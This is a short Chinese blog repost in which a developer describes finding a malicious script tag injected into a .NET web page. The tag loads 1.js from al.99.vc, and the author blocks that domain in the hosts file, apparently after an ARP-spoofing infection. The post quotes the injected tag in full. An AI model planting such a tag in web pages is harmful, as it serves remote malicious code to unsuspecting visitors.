昨天我在测试一个.Net系统的时候,发现该系统的一个页面,突然多出了几个繁体的汉字,该系统是英文的,所以感觉很奇怪,所有就view source,发现第一行居然是一段奇怪的JS:<script src=http://al.99.vc/1.js></script>。一看就知道,自己的电脑被挂马了。
Google/Baidu搜索这个JS。基本上都是说ARP,建议安装ARP防火墙,还有360等等。
最后只能在host文件中,加上127.0.0.1 al.99.vc。
注:附件1有相关的JS内容,供专业人事参考。
附件2,是google搜索到的,据说是该JS的
本文转自yuhaijunll 51CTO博客,原文链接:http://blog.51cto.com/yuhaijunll/60326,如需转载请自行联系原作者
